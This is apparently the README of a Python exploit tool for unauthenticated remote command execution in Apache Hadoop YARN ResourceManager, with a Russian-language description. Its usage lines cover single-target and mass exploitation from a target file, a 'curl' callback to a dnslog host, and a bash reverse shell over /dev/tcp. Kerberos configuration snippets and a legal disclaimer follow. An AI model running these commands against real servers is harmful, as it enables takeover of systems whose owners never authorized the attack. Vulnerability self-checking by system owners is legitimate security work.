
Hadoop Yan ResourceManager unauthorized RCE
Существовала уязвимость несанкционированного доступа в Hadoop yarn ResourceManager. Эта уязвимость присутствовала в Hadoop yarn — основном компоненте Hadoop. Поскольку Hadoop yarn по умолчанию открывал службу RPC для всех, удалённый злоумышленник мог воспользоваться этой уязвимостью несанкционированного доступа и выполнить произвольные команды через службу RPC, тем самым получив контроль над целевым сервером. Учитывая высокорискованный статус и большой вред этой уязвимости, а также то, что детали уже были раскрыты и использованы злоумышленниками, рекомендуется всем пользователям Apache Hadoop провести самопроверку и своевременно принять меры безопасности.
Apache Hadoop Yarn *
python3 Hadoop_Yan_RPC_RCE.py

python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "curl xxx.dnslog.cn"


python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

https://nosec.org/home/detail/4905.html
https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth
<property>
<name>hadoop.security.authentication</name>
<value>kerberos</value>
<final>false</final>
<source>core-site.xml</source>
</property>...
<property>
<name>hadoop.rpc.protection</name>
<value>authentication</value>
<final>false</final>
<source>core-default.xml</source>
</property>
Торжественно заявляем: не используйте этот инструмент для незаконных операций. Этот инструмент предназначен только для самостоятельной проверки безопасности сотрудниками стороны A и сотрудниками стороны B. Если пользователь использует его незаконно, юридическая ответственность возлагается на пользователя!!!